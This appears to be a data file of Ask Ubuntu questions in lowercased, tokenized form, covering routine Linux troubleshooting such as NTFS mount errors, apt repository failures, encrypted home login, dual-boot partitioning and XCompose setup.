446058	unable to mount one of the partition of windows from ubuntu	my windows is failing to start with a blue screen and when i attempt to access the c drive from my ubuntu , i got this error : - error mounting : mount exited with exit code 13 : $ logfile version 2.0 is not supported . ( this driver supports version 1.1 only . ) $ logfile version 2.0 is not supported . ( this driver supports version 1.1 only . ) did not find any restart pages in $ logfile and it was not empty . the file system was n't safely closed on windows . fixing . ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i am able to mount all other partitions which were initially assigned to windows 8 what are the possible solutions for me ? i can even go for a complete disc reformat . is there any way i can recover the partition ? any suggestion will be appreciated !
446059	installing ubuntu and windows 8 on ssd and user files on hdd	quick note about my system : i have an absolutely clean ( in terms of data on hard drives ) laptop with a 128gb ssd and 1tb hdd , both secure boot and uefi can be disabled in bios menu . my question is really about partitions : basically , i want to install windows 8 on ssd with user files on hdd , and same with ubuntu . i think it will be a good idea to create partitions from ubuntu live usb using gparted before installing any of the operating systems . could you please advise me on partitions ? i know that windows 8 requires a ntfs partition and ubuntu requires `` / '' , `` /boot '' , `` /home '' and `` swap '' partitions on ext4 but where should i place them ? my best guess is making a 30gb ntfs on ssd for windows 8 and pointing all user folders to the hdd by editing registry , than using the rest of ssd for all 4 ubuntu partitions as most of ubuntu software i use is lightweight ( + i 'm pretty sure i 'll be able to access the hdd anyway ) . but i 'm not sure whether such partitioning will cause problems or not .
446060	how can i search within pdf content ?	we used recoll with a desktop pc for searching between pdf-s . in the last week we moved everything to a server . is there alternative recoll solution for server . we would like to index pdf files and by using a web interface searching among them ?
446062	can i install ubuntu server 12.04 without an internet connection ?	i 've tried to install ubuntu server 12.04 from a usb drive on my system but it requires internet connection for loading additional components . presently the system in which i wish to install ubuntu server has no internet connectivity . it is just a part of my home network . is there any other method to install this os without internet connectivity ? ?
446064	is there a way to test if i will be able to login again ?	i messed up with my files ... again ... now i am concerned if i will be able to login again once i logout . is there a way to test if the essentials files are all there ? my home was encrypted during the installation ( ubuntu 12.04 ) . by login i mean boot ubuntu into lightdm , type my password and be able to use my files which are encrypted and should be decrypted after the login . by messed up i mean i have moved all my `` .xml '' files under user directory . i do not care that much for the configuration of the applications , neither for my keyboard shortcuts as i have a backup for them . i can run ecryptfs-unwrap-passphrase ~/.ecryptfs/wrapped-passphrase and it shows me the passphrase . at ~/.ecryptfs i have auto-mount auto-umount private.mnt private.sig wrapped-passphrase . one ecryptfs manual says : $ man ecryptfs-setup-private files ~/.ecryptfs/auto-mount ~/.private - underlying directory containing encrypted data ~/private - mountpoint containing decrypted data ( when mounted ) ~/.ecryptfs/private.sig - file containing signature of mountpoint passphrase ~/.ecryptfs/private.mnt - file containing path of the private directory mountpoint ~/.ecryptfs/wrapped-passphrase - file containing the mount passphrase , wrapped with the login passphrase ~/.ecryptfs/wrapping-independent - this file exists if the wrapping passphrase is independent from login passphrase may be those all are the required files ? edit : i rebooted the computer and although i have lost the configuration of applications and keyboard shortcuts i was able to login again . so i can say that no xml file is needed to login into an ubuntu encrypted home . but the question remains valid : is there a way to test if one will be able to login in the next boot ?
446068	ca n't install python-pandas on ubuntu	i am trying install python library pandas on ubuntu system , and it seems to work , but it it does not . here is what i did : sudo pip install pandas this seemed to install pandas properly . i got this message : successfully installed pandas python-dateutil pytz numpy six cleaning up ... however , when i ran : pip freeze i did not see pandas installed . also , when i tried to import pandas in python shell in i could n't ( obviously ) . any ideas what is going wrong ? or what i could do to trouble shoot , and figure out what is going ? i am using ubuntu 12.04 . thank you
446070	automatically reconnect to more preferred wlan network if it becomes available	assume this situation : 3 wlan networks ( with wpa ) to which my notebook connects automatically . those are : network_work ( fixnet wlan accesspoint ) network_home ( fixnet wlan accesspoint ) network_mobile ( android mobile phone hotspot ) furthemore assume virtualbox and windows 8.1 installed on my notebook , with bridged network to the wlan0 interface . present situation : first , i switch on my notebook at home ( auto-connects to network_home ) . then i go onto the train to work in the morning , ( no laptop restart , auto-connects to network_mobile ) then i arrive at work ( no laptop restart , network annoyingly stays network_mobile ) then i sometimes switch on virtualbox with windows 8.1 on it . windows 8.1 will usually download updates ( up to 1 gb ) . now when i have the problem that if i forget to switch the wlan network to network_work , windows will use-up all my monthly data contengency completely ( 1 gb ) , until android blocks the connection . unforunately , this has now happend for the second time , so it 's unlikely i will not forget it in the future . i also have the same problem on return from work . how can i have ubuntu automagically switch from network_mobile to network_home or network_work if it becomes available ? and if that 's not possible , how can i write a script that changes my wlan network to wlan_work ( so that i can run editions of that script at 08:30 o'clock and 19 o'clock ) ?
446071	how to determine whether a dvd is re-writable or not ?	is there any command or a tool that can tell me if i can rewrite a dvd ? ? ? because sometimes companies fool you and write on their dvds rw when they are not .
446073	can we change window background to a custom image ?	can we change a window background ( when a folder opens ) like how a dash home looks ? a transparent , blur with crystal clear icons . i tried with ccms , but it wo n't give dash home like feel . if there is a solution , please share .
446076	change environment varaible ( term )	according to this answer , `` it is the job of the terminal emulator to set the term environment variable '' . is there any way to change the term value used by terminator ? right now it 's xterm , but i need xterm-256color . i use other terminal emulators ( gnome terminator , tmux ) , so setting in my .bashrc would be messy at best .
446078	error : the update information is outdated because of network problems or old repositories	in the top right of my screen there is a red signal which is saying that there are some networks problems . i tried to update it but could n't . how to solve this now ? update error : err http : //bd.archive.ubuntu.com precise/restricted sources 404 not found err http : //bd.archive.ubuntu.com precise/main sources 404 not found err http : //bd.archive.ubuntu.com precise/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise/universe sources 404 not found err http : //bd.archive.ubuntu.com precise/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/multiverse i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/restricted sources 404 not foundo err http : //bd.archive.ubuntu.com precise-updates/main sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/universe sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/multiverse i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/main sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/restricted sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/universe sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/multiverse i386 packages 404 not found fetched 532 kb in 48s ( 11.0 kb/s ) w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . forhad @ forhad-desktop : ~ $
446079	how to make sudoreplay work ?	i recently discovered sudoreplay whose manpage says that it replays sudo session logs . but i am not sure how do i make it work . for whatever little commands i ran it kept on saying that /var/log/sudo-io does n't exist . $ sudoreplay -l user aditya command apt-get sudoreplay : unable to open /var/log/sudo-io : no such file or directory $ sudoreplay -l fromdate yesterday sudoreplay : unable to open /var/log/sudo-io : no such file or directory the man page says : /var/log/sudo-io the default i/o log directory . it looks like i need to enable logging and it is n't enabled by default . what changes do i need to make to use sudoreplay ?
446084	how to calibrate the laptop battery on 12.04	since a couple of days or so my laptop ( asus n76vm ) does a hard shut-down when the battery indicates 20 % life left . it just cuts off the power , no shut-down screen or anything , making the hard drive do that nasty 'scratchy ' sound . what should i do now ? it seems the battery is less powerfull than it was before ( wich is just logical ) but the os did n't keep track . how should i go about and re-calibrate the battery ?
446087	ubuntu 14.04 beta is advisable for installation ? and can i upgrade it to final version on april 17 ?	i wish to install ubuntu 14.04 beta in my laptop pc . can i update beta to latest one by using apt-get upgrade command when final version release on april 17 ?
446091	when do i set the password to unlock a private ssh key ?	i 'm trying to set up ssh with bitbucket but failing . i generate my keys , add my public key to the repositry , load my keys , i try to push to the origin and i get a pop up saying : 'enter password to unlock the private key' i 'm just not sure what it means . i did n't set a pass phrase for my key , so what password does it mean ?
446092	how do i set boot parameters in the installer ?	i downloaded ubuntu and burned it to a disc . the installer loads just fine , but will not find my hard drive . basically i need to set the nolapic boot parameter for it to find my hd controller . is there a way for me to set the boot parameters on the installer ?
446093	suddenly can not connect to the internet on dell vostro 1550 laptop	my friend had bought a dell vostro 1550 laptop a few years ago . 1 weak back suddenly she could not connect to the internet in any ways ( wifi , lan ) . the laptop has got windows 7 and ubuntu os . in both of the os 's she is unable to connect to the internet . few days back she re-installed both windows and ubuntu . after this she could connect to the internet . but today again the same problem has occurred . is this a driver problem ? or a problem with mac address . actually we are using the internet service provided by our college . thanks in advance .
446095	xubuntu package broken : conflict between open office en libreoffice	i use open office software , version 4.0.1 on a xubuntu system . since i tried to install also the libreoffice-writer on the system : the system package of xubuntu is broken . it is not possible any more to uninstall open office or uninstall libreoffice-writer , finally to reinstall open office and get rid of libreoffice . it is not possible any more to download any software at all on the pc . every time i try to repair the xubuntu package , xubuntu asks me to reinstall libreoffice-common . but when i try to install it , it does not succeed . an error is displayed . on the internet i have seen that openoffice and libreoffice both use the same files . that is the reason both software packages conflict with each other . can anyone tell me what i should do to get out of this problem ?
446096	ca n't install ubuntu 13.10 ; freezing on configuring bcmwl-kernel-source	for three hours , i have been trying to install ubuntu 13.10 on my gateway mx6445 laptop , but every time , installation stops in the last step . could anyone help me ?
446097	unable to boot from hard drive after installing ubuntu	my apologies if i 've overlooked the answer elsewhere on this board . i have spent the last almost two weeks on and off trying to resolve this issue : ca n't successfully boot up hard drive after indication of 'successful installation ' from live media disk . every attempt gives me the trace run ending with the fixing recursive fault but reboot is needed error message . i have attempted as many of the grub parameter alterations as i have come across as possible fixes to no avail . i am thoroughly comfortable working with ubuntu . i have installed ubuntu on laptops in the past both as a dual boot with windows and as a standalone os with no problems prior to this . my hardware : dell inspiron 1501 with sempron 3500+ , 2gb ram , 60gb hard drive , with ubuntu 13.10 the only os installed . my pastebin file : http : //paste.ubuntu.com/7231541/ i refuse to give up ! please help me ! thanks in advance for any help ! note : do n't mind admitting that i may be overlooking something simple . therefore , if there is someone who knows for sure how to resolve this issue , please break it down in a step-by-step way for the benefit of anyone else besides myself . thanks !
446098	how to fix quadruple screen in teamviewer ?	when i connect with my remote ubuntu server ( from windows 7 ) everything i get is a quadruple cut-off image of something that from far looks like a desktop environment : i have googled this error and have still no answer nor any idea why this problem occurs . i already tried common solutions like rebooting , reinstalling , updating app and system , check the network ports and closed all unimportant tasks . the ubuntu version is 12.04.4 did anybody have the same problem and/or knows the solution ?
446099	unable to install libjpeg-turbo8-dev on ubuntu	i tried to install libjpeg-turbo8-dev like this . sudo apt-get install libjpeg-turbo8-dev now i can install nothing on my ubuntu without this package . for example , i tried to install mysql . it will show me this : ~ $ sudo apt-get install mysql-server mysql-client reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libjpeg8-dev : depends : libjpeg-turbo8-dev ( > = 1.1.90+svn722-1ubuntu6 ) but it is not going to be installed mysql-client : depends : mysql-client-5.5 but it is not going to be installed mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
446102	how to reinstall ubuntu in the easiest way ?	i just want to delete everything except maybe /home folder and reinstall everything , because system became a little bit slow and i want to do that when 14.04 comes out . what 's the best way to do that ? at the moment i have 12.04 and have some other systems ( cinamon , lubuntu etc . ) that i want gone .
446103	thunderbird ldap entry formats	i have thunderbird working with an ldap-connected address book . entries are successfully looked up , but they appear like this : '' bob.bobson '' < bob.bobson @ foo.com > instead of this : bob bobson < bob.bobson @ foo.com > this is ugly and aggravating . is there any way that i can custom-format returned entries ?
446104	recorded sound using mic heard in only one speaker	i just installed vokoscreen to record screen and sound.i have also installed pulse audio volume control to control the devices.i am using my mobile earphone to record sound . so when i record , i speak into the left earphone and it records fine.but when i play the sound i can hear it only in the left earphone.no sound in the right earphone.to have sound in both the earphones i have to hold both earphones in front of my mouth while recording . is n't there any way so that it records from only one speaker and play into both the speakers .
446108	no option for booting into ubuntu when sharing drive with windows 7	using the 12.04 install dvd i installed ubuntu on the same drive as windows . it is defaulting to windows each time . how can i change this ?
446109	apt-get update gives bzip2 error on fresh ubuntu 12.04 ( lts ) in virtual box version 4.2.18	a fresh install of ubuntu 12.04 ( lts ) onto virtual box 4.2.18 seems to go well , however , i receive a bzip2 related error when trying to update . i was hoping a seasoned ubuntu expert could help me decipher and correct the problem . here is the terminal output : adam @ adamvb : ~ $ sudo apt-get update [ sudo ] password for adam : hit http : // extras.ubuntu.com precise release.gpg get:1 http : // security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : // extras.ubuntu.com precise release hit http : // us.archive.ubuntu.com precise release.gpg hit http : // extras.ubuntu.com precise/main sources get:2 http : // security.ubuntu.com precise-security release [ 49.6 kb ] hit http : // extras.ubuntu.com precise/main amd64 packages hit http : // extras.ubuntu.com precise/main i386 packages ign http : // extras.ubuntu.com precise/main translationindex get:3 http : // us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : // us.archive.ubuntu.com precise-backports release.gpg hit http : // us.archive.ubuntu.com precise release get:4 http : // security.ubuntu.com precise-security/main sources [ 102 kb ] ign http : // extras.ubuntu.com precise/main translation-en_us get:5 http : // us.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : // extras.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise-backports release hit http : //us.archive.ubuntu.com precise/main sources get:6 http : //security.ubuntu.com precise-security/restricted sources [ 2,494 b ] get:7 http : //us.archive.ubuntu.com precise/restricted sources [ 5,470 b ] 100 % [ 7 sources bzip2 10.0 kb ] [ waiting for headers ] [ waiting for headers ] bzip2 : data integrity error when decompressing . input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . get:8 http : // security.ubuntu.com precise-security/universe sources [ 30.9 kb ] 100 % [ 8 sources bzip2 0 b ] [ waiting for headers ] [ connecting to security.ubuntu bzip2 : compressed file ends unexpectedly ; perhaps it is corrupted ? *possible* reason follows . bzip2 : inappropriate ioctl for device input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . hit http : // us.archive.ubuntu.com precise/universe sources hit http : // us.archive.ubuntu.com precise/multiverse sources get:9 http : //security.ubuntu.com precise-security/multiverse sources [ 1,797 b ] hit http : // us.archive.ubuntu.com precise/main amd64 packages hit http : // us.archive.ubuntu.com precise/restricted amd64 packages get:10 http : //security.ubuntu.com precise-security/main amd64 packages [ 376 kb ] hit http : // us.archive.ubuntu.com precise/universe amd64 packages hit http : // us.archive.ubuntu.com precise/multiverse amd64 packages hit http : // us.archive.ubuntu.com precise/main i386 packages hit http : // security.ubuntu.com precise-security/restricted amd64 packages get:11 http : // security.ubuntu.com precise-security/universe amd64 packages [ 91.8 kb ] get:12 http : // security.ubuntu.com precise-security/multiverse amd64 packages [ 2,439 b ] get:13 http : // security.ubuntu.com precise-security/main i386 packages [ 402 kb ] get:14 http : // security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:15 http : // security.ubuntu.com precise-security/universe i386 packages [ 96.5 kb ] get:16 http : // security.ubuntu.com precise-security/multiverse i386 packages [ 2,649 b ] hit http : // security.ubuntu.com precise-security/main translationindex hit http : // security.ubuntu.com precise-security/multiverse translationindex hit http : // security.ubuntu.com precise-security/restricted translationindex hit http : // security.ubuntu.com precise-security/universe translationindex get:17 http : // us.archive.ubuntu.com precise/restricted i386 packages [ 454 kb ] hit http : // security.ubuntu.com precise-security/main translation-en hit http : // security.ubuntu.com precise-security/multiverse translation-en hit http : // security.ubuntu.com precise-security/restricted translation-en hit http : // security.ubuntu.com precise-security/universe translation-en get:18 http : // us.archive.ubuntu.com precise/universe i386 packages [ 105 kb ] hit http : // us.archive.ubuntu.com precise/multiverse i386 packages hit http : // us.archive.ubuntu.com precise/main translationindex hit http : // us.archive.ubuntu.com precise/multiverse translationindex hit http : // us.archive.ubuntu.com precise/restricted translationindex hit http : // us.archive.ubuntu.com precise/universe translationindex get:19 http : // us.archive.ubuntu.com precise-updates/main sources [ 454 kb ] get:20 http : // us.archive.ubuntu.com precise-updates/restricted sources [ 8,028 b ] get:21 http : // us.archive.ubuntu.com precise-updates/universe sources [ 105 kb ] get:22 http : // us.archive.ubuntu.com precise-updates/multiverse sources [ 8,909 b ] get:23 http : // us.archive.ubuntu.com precise-updates/main amd64 packages [ 763 kb ] get:24 http : // us.archive.ubuntu.com precise-updates/restricted amd64 packages [ 12.2 kb ] get:25 http : // us.archive.ubuntu.com precise-updates/universe amd64 packages [ 238 kb ] get:26 http : // us.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 15.3 kb ] get:27 http : // us.archive.ubuntu.com precise-updates/main i386 packages [ 787 kb ] get:28 http : // us.archive.ubuntu.com precise-updates/restricted i386 packages [ 12.2 kb ] get:29 http : // us.archive.ubuntu.com precise-updates/universe i386 packages [ 243 kb ] get:30 http : // us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 15.4 kb ] hit http : // us.archive.ubuntu.com precise-updates/main translationindex hit http : // us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : // us.archive.ubuntu.com precise-updates/restricted translationindex hit http : // us.archive.ubuntu.com precise-updates/universe translationindex hit http : // us.archive.ubuntu.com precise-backports/main sources hit http : // us.archive.ubuntu.com precise-backports/restricted sources hit http : // us.archive.ubuntu.com precise-backports/universe sources hit http : // us.archive.ubuntu.com precise-backports/multiverse sources hit http : // us.archive.ubuntu.com precise-backports/main amd64 packages hit http : // us.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : // us.archive.ubuntu.com precise-backports/universe amd64 packages hit http : // us.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : // us.archive.ubuntu.com precise-backports/main i386 packages hit http : // us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : // us.archive.ubuntu.com precise-backports/universe i386 packages hit http : // us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : // us.archive.ubuntu.com precise-backports/main translationindex hit http : // us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : // us.archive.ubuntu.com precise-backports/restricted translationindex hit http : // us.archive.ubuntu.com precise-backports/universe translationindex hit http : // us.archive.ubuntu.com precise/main translation-en hit http : // us.archive.ubuntu.com precise/multiverse translation-en hit http : // us.archive.ubuntu.com precise/restricted translation-en hit http : // us.archive.ubuntu.com precise/universe translation-en hit http : // us.archive.ubuntu.com precise-updates/main translation-en hit http : // us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : // us.archive.ubuntu.com precise-updates/restricted translation-en hit http : // us.archive.ubuntu.com precise-updates/universe translation-en hit http : // us.archive.ubuntu.com precise-backports/main translation-en hit http : // us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : // us.archive.ubuntu.com precise-backports/restricted translation-en hit http : // us.archive.ubuntu.com precise-backports/universe translation-en err http : // us.archive.ubuntu.com precise/restricted sources 404 not found [ ip : 91.189.91.15 80 ] fetched 4,432 kb in 2min 31s ( 29.3 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_universe_source_sources hash sum mismatch w : failed to fetch http : // us.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . adam @ adamvb : ~ $ any ideas ? thanks !
446111	ubuntu 12.0.4 lts installation	i am using vmware workstation v 10.0.1 and installed ubuntu 12.0.4 lts . after installation , i could not see the unity desktop screen but only text interface is shown to me . i decided to install the desktop interface ( gui ) and did the below . sudo apt-get update sudo apt-get install compizconfig-settings-manager sudo apt-get upgrade nothing happened but these command totally downloaded 2 gigs of data . finally i tried the below : apt-get install unity installation seem to be completed but nothing changed apt-get install ubuntu-desktop this command downloaded 983 mb of data and installed . so to check whether i can able to access the unity desktop , i tried to reboot the system using sudo reboot but in vain . it hung up at stopping virtual printing daemon . i had to manually power shutdown and restarted it . this time , i saw the unity login screen but when i typed my username and passsword , it accepted my login for a while and then went to text interface for a while and came back to unity login screen . no matter how much time i tried , the same process is happening . it returns to the unity login screen . ( if i enter wrong password , it says invalid login , so i am filling the right password ) . between , from the unity login screen , i use ctrl+alt+f1 to go to text interface or ctrl+alt+t for switch to terminal which works but can not login to the system from unity login screen . please help .
446112	hp pavilion g6 2312 ax drivers for ubuntu	i am new to linux and have successfully installed ubuntu with windows 8 . my laptop is hp pavilion g6 2312 ax . graphic processor:512 mb amd radeon hd 7660g ( integrated ) and 2 gb ati mobility radeon 7670m hd graphics ( dedicated ) . i can not find or basically understand how to install these drivers . i am not just talking about graphic drivers but all drivers present . thank you .
446114	ca n't change brightness when installing	i 'm kind of newbie in ubuntu . after several hours of research and trail , i finally managed to boot into ubuntu installation screen via usb . however , my screen brightness is really really dim , i can barley see what 's on the screen . because i have n't officially install the ubuntu , i can not use terminal to adjust it . so anyone offer some suggestions ? thanks a lot , i do n't want to stop at here .
446115	adding facebook online account - `` application you are trying to use does n't exist or has been disabled ''	i noticed on april 9 that empathy was n't connecting to facebook chat , so i opened online accounts , and it appears that i needed to authorize ubuntu to access facebook . but then i could n't do that - when i try , the web server at facebook responds with '' facebook error accessing app we 're sorry , but the application you 're trying to use does n't exist or has been disabled . '' i tried removing and adding the facebook account again , and got the same result . does anyone know if facebook shut down the authentication app due to the heartbleed bug ? if so , any word on when it will be back up again ?
446119	which icon does indicator-power use when fully charged ?	this is a minor annoyance . using xubuntu 14.04 . i installed the latest faenza icon set . unfortunately , it 's missing the icon for when the battery is fully charged ( adapter is connected ) . it looks like this : ( the blank icon next to volume ) as soon as i unplug , it will change to appropriate icons ( discharging , or if i plug it back in , charging ) . i can use any of the other faenza icons to be displayed when it 's charged , it 's just that i do n't know which one the indicator-power is looking for . thanks in advance .
446121	how to install antlr3 python module on ubuntu ?	if you are getting `` import error : no module named antlr3 '' while running python application . for example , keyboardlayouteditor , django apps .
446123	ubuntu 12.04 eclipse install	i feel like a tool asking this , but i 've spend a couple of hours trying to get it to work with no luck , so i 'm sucking it up and asking . i followed the directions here ... how to install eclipse ? ..specifically the 2nd answers ( 102 upvotes ) . i have an icon but when i click it nothing happens . the version i downloaded was : http : //www.eclipse.org/downloads/packages/eclipse-ide-java-ee-developers/keplersr2 64bit . i have a dell e6530 w/a core i5 , so i am assuming 64bit is what i need . someone please chime in if thats not right . what else can i try here ? i also tryed installing from the software center thingy , and the download hung up , so i gave up on that . any help appreciated .
446126	ca n't open a specific website . can open with a proxy . wget stucks on `` http request sent , awaiting response ... ''	ok , i 'm having a very weird problem . i 've searched through google and ubuntu forums but it seems that this problem , if faced , is unsolvable . however , i 'm very hopeful that i 'll get a solution here . the problem is such that i ca n't open a specific website from chrome and firefox . i can ping it . but wget gets stuck on 'http request sent , awaiting response ... ' . i can access the website with a proxy . i could access the website fine for last 3 to 4 days . but today , all of a sudden . i ca n't access the website . solutions please . best regards , omar
446129	problem installing ubuntu using windows installer	i am trying to install ubuntu using the windows installer ( my first time trying to use linux ! ) , and when i try to download the installer , i get the screen asking for donations , but ca n't go any further . there is a `` pay with paypal '' button , and no way to continue . any help appreciated ! i am using xp .
446130	remap windows key	i have a hardware `` windows '' button on the front of my lenovo ideapad yoga 13 that maps to the `` windows '' key . according to xev , the keycode passed by the `` windows '' key is the same that is passed by the windows button . when i have a certain x application running in the foreground ( eg , fullscreened or with focus ) , i would like this windows button to map to `` right click at the current cursor position '' . can i do this solely with xmodmap ? how do i pass the `` right click '' event to the foreground x application ? i would rather this change not affect the unity dash shortcut or gnome shell or whichever window manager i am using at the time .
446132	chown only for directory ntfs-3g	i just want to move my default mysql ( installed by lamp ) directory to ntfs-3g partition , so it was the same i use on windows . i 've already done this with htdocs . there comes my question : i mount -o bind the folder of /opt/lampp/var/mysql to /media/dane/mysql but to work properly it has to be posessed by mysql user of mysql group . i mount ntfs-3g partition as root at boot ( in /etc/fstab ) . the only thing i want is to chown only one directory on dane partition . how do i do so ? i do n't want to change the whole partition 's owner .
446135	vbox : error mounting shared folders in ubuntu 12.04 guest	i have an ubuntu 12.04 guest running on an ubuntu 13.10 host . i created a shared folder in the host following the documentation . when i try to mount the folder in the guest the result is : $ sudo mount -t vboxsf -o uid= $ uid , gid= $ gid shared ~/host gid= requires an argument ( i.e . gid== < arg > ) % 29 % 22 '' > a web search for this error returns zero results .
446140	xcompose not working for high level unicode characters	i 'm trying to write some key stroke combinations into my xcompose to allow for typing cuneiform characters , which are defined in the u+12000 - u+1247f range . i 've written other strange symbols into my xcompose file , such as signs of the zodiac and planets etc ... and they all work just fine , even with the double multi_key at the beginning ( it 's all for my research ) . here 's an excerpt of the file : ... # abbreviating some of the longer ones . < multi_key > < multi_key > < s > < c > < o > < r > < p > : `` ♏ '' u264f # scorpius < multi_key > < multi_key > < s > < a > < g > < i > < t > : `` ♐ '' u2650 # sagittarius < multi_key > < multi_key > < c > < a > < p > < r > < i > < c > : `` ♑ '' u2651 # capricorn < multi_key > < multi_key > < a > < q > < u > < a > < r > : `` ♒ '' u2652 # aquarius < multi_key > < multi_key > < p > < i > < s > < c > < e > < s > : `` ♓ '' u2653 # pisces # really , this should be serpentarius . all the other signs are in latin . < multi_key > < multi_key > < o > < p > < h > < i > < u > < c > : `` ⛎ '' u26ce # ophiuchus # cuneiform < multi_key > < multi_key > < c > < a > : `` '' # cuneiform sign : a < multi_key > < multi_key > < c > < a > < x > < a > : `` '' # cuneiform sign : a x a < multi_key > < multi_key > < c > < a > < x > < bad > : `` '' # cuneiform sign : a x bad just to prove that i have the fonts installed to show these signs , i 'm attaching a screenshot of gedit editing this file , showing the appropriate glyphs displaying : when i try to use these key combinations for the cuneiform signs i get no character in either gedit or libreoffice ( or any other text input program for that matter ) . i 'm not sure what 's wrong with the file , i think i 've followed the correct syntax , and i have the fonts installed . does xcompose not supported unicode glyphs at such a high range ?
